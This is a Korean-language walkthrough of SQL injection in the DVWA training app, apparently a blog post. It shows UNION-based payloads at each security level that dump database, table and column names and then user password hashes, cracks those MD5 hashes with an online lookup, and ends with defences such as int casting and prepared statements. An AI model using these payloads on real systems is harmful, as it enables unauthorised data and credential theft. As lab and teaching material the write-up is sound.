[DVWA] SQL Injection (Order by / Union)

Vulnerability: SQL Injection

쿼리문의 구조를 파악하고, UNION SQL Injection을 적용하여 DB 내부의 데이터를 조회하는 것을 목적으로 한다.

DVWA SQL Injection 실습

실습 환경
- Windows Docker를 이용한 DVWA
- Windows 환경의 Burp Suite

Security Level: Low

order by를 이용하여 컬럼(Column)의 개수를 확인해본다.

 

Order by

1' order by 1~2 #

위와 같이 1~2의 경우 결과 값이 나온다.

1' order by 3 #

3을 입력한 경우 에러가 발생하게 된다. 즉 컬럼은 2개라는 것을 알 수 있다.

이제 UNION SQLi Process에 맞춰 진행한다.

 

Column 위치 찾기

컬럼의 개수가 2개라는 것 까지 확인했으므로, 출력되는 컬럼의 위치를 찾아본다.

1' union select 1, 2 #

위의 결과를 보면 First name에 1번 컬럼이, Sunname에 2번 컬럼이 출력되고 있는 것을 확인할 수 있다.

 

DB 이름 확인하기

1' union select database(),2 #

해당 DB의 이름은 dvwa임을 확인할 수 있다.

 

TABLE 이름 확인하기

1' union select table_name,2 from information_schema.tables where table_schema = 'dvwa' #

dvwa DB는 guestbook 과 users 라는 2개의 Table로 구성되어 있는 것을 확인할 수 있다. 이중에서 users 가 회원정보일 것으로 예상되므로 이를 확인해 본다.

 

COLUMN 이름 확인하기

1' union select column_name,2 from information_schema.columns where table_name = 'users' #

users 테이블(dvwa.users)는 user_id, first_name, last_name, user, password, avatar, last_login, failed_login의 8개의 컬럼으로 구성된 것을 확인할 수 있다.

조회에 사용된 User ID는 user_id 컬럼일 것이다. 그리고 유저 정보는 user, password를 확인해봐야 할 것으로 보인다.

 

DATA 확인하기

users 테이블에서 user, password 컬럼을 열람하여 Data를 확인해 본다.

1' union select user, password from users #

위와 같이 5개의 계정과 비밀번호에 해당하는 계정정보를 확인할 수 있다. 해당 계정정보의 비밀번호를 보면 해쉬값으로 저장되어 있다. 이 해쉬로부터 비밀번호를 알아낼 수 있다면 관리자 및 사용자 권한을 탈취할 수 있다.

 

비밀번호 해쉬(HASH) 풀이

비밀번호는 대부분 해쉬(hash) 값으로 저장된다. 해쉬는 단방향 암호화의 일종으로 이론적으로는 복호화가 불가능하다. 하지만 널리 알려진 문자열(취약한 비밀번호)인 경우에는 추정하는 것이 가능하다. 구글이나 해쉬 데이터베이스를 이용하거나, 취약한 비밀번호 목록으로부터 해쉬 처리를 하여 동일한 해쉬가 있는지 확인해볼 수 있다.

구글에서 검색을 통해 확인해보면 다음과 같다.

https://md5.gromweb.com/

위와 같이 각각의 해쉬 값은 1234, abc123, charley, letmein, password 에 해당하는 md5() 해쉬 값임을 확인할 수 있다.

숫자와 알파벳으로 구성된 32자 짜리 해쉬는 대개 MD5 해쉬이다.

---

Security Level: Medium

Medium 레벨의 경우, id 파라미터가 숫자값을 받도록 되어 있었기 때문에 ' 가 없이 입력된다.

실제 코드를 살펴보면 mysqli_real_escape_string을 이용하여 ' 입력값은 \' 로 입력되어 '로 인식되지 않는다.

해당 레벨에서도 UNION SQLi Process에 맞춰 진행한다.

 

Order by

( ' ) 없이 입력 한다.
1 order by 1 / 1 order by 2

1 order by 3

위와 같이 1,2 에 대한 결과는 나오지만 3에대한 결과는 나오지 않는 것으로부터 컬럼의 개수가 2개임을 알 수 있다.

 

Column 위치 찾기

1 union select 1,2

 

DB 이름 확인하기

1 union select database(),2

 

TABLE 이름 확인하기

사용자 입력값(id)에 대하여 mysqli_real_escape_string() 함수를 처리하고 있기 때문에  ', " 와 같은 문자가 SQL문으로 처리되는 것을 방지한다. 그렇기 때문에 큰따옴표(")나 작은따옴표(')를 사용하지 않고 확인한다.

1 union select table_name,2 from information_schema.tables

where 구문을 이용하려면 table_schema = 'dvwa' 와 같이 ' 가 필요하기 때문에 where 구문 없이 전체를 확인하기로 한다.

 

COLUMN 이름 확인하기

위와 같이 ' 없이 확인하기 위해 where 구문 없이 확인한다.

1 union select column_name from information_schema.columns

전체 테이블에 대한 컬럼을 조회하였으므로, comment_id, comment, name 테이블을 확인해볼 수 있다.

 

DATA 확인하기

1 union select user, password from dvwa.users

---

Security Level: High

here to change your ID. 를 누르면 다음과 같은 창이 나온다.

// Get input
$id = $_SESSION[ 'id' ];

// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";

SQL문에서 사용할 id 값을 서버의 세션(session)으로부터 읽어서 사용하기 때문에 온전하게 안전한 방법이라고 할 수 있다. 실질적으로 사용자가 서버에 저장된 세션 내의 값을 조작할 방법이 없기 때문이다.

하지만 해당 문제의 경우 서버의 세션에 저장되는 값을 사용자가 변경할 수 있는 아래와 같은 웹 애플리케이션을 제공한다. 

이것은 비현실적인 상황을 가정한 것으로 보아도 무방하다고 할 수 있다. 일반적으로 세션은 서버가 자동으로 만드는 것으로, 로그인을 하는 과정에서 검증된 값(ID, 권한)을 저장한다. 이러한 값은 서버에 저장되는 값으로서 사용자가 관여할 수 있는 경우는 거의 없다고 볼 수 있다.

 

High 레벨의 경우 WHERE 구문 뒤에 LIMIT 1으로 제한을 하고 있기 때문에 주석(#)을 이용하여 여러줄을 출력할 수 있도록 한다. (Medium 레벨에서 사용했던 mysqli_real_escape_string가 적용되어 있지 않기 때문에 ', " 가 사용 가능하다.)

 

Order by

1' order by 1~2 #

1' order by 3 #

 

Column 위치 찾기

1' union select 1,2 #

 

DB 이름 확인하기

1' union select database(), 2 #

 

TABLE 이름 확인하기

1' union select table_name,2 from information_schema.tables where table_schema = 'dvwa' #

 

COLUMN 이름 확인하기

1' union select column_name,2 from information_schema.columns where table_name = 'users' #

 

DATA 확인하기

1' union select user, password from users #

---

Security Level: Impossible

Impossible 레벨의 코드는 위와 같다. 이를 살펴보면 다음과 같다.

 Anti-CSRF token이 적용되어 있는데, 이는 현실적으로 SQL Injection의 방어에는 별 도움이 되지 않는다.

또 다른 방어 수단은 is_numeric() 함수가 적용되어 있는데, id 값이 숫자인 경우에만 SQL문으로 이 값을 전달하게 된다.

해당 문제에서의 파라미터인 id의 경우 1,2,3,4,5와 같은 정수형을 기본으로 한다. 때문에 is_numeric() 함수도 가능하지만 is_int() 함수로 대체하여 사용하는 것이 가능하다.
또한 함수를 이용하지 않고 가용성을 높이고자 한다면 '강제 형변환(type casting)'을 적용할 수도 있다.

$id = $_GET['id']; 대신에 $id = (int)$_GET['id']; 와 같이 GET으로 받아온 변수를 정수(int)로 형변환 하는 경우, 굳이 is_numeric()이나 is_int()와 같이 함수를 사용하지 않아도 된다는 것이다.
이 경우, 문자열이 숫자로 시작하면 숫자까지만 숫자로 받아들이고 뒷부분은 무시한다. 첫 문자가 숫자가 아니라면 무조건 0으로 변환하게 된다.

(숫자 형식이 아니면 SQL 문으로 전달하지 않기 때문에 SQL Injection을 방지할 수 있다.)

또한 Prepared State를 이용하기 때문에 SQL Injection을 완전하게 방지하고 있다고 볼 수 있다.

---

질문 환영, 수정 및 보완에 대한 지적 환영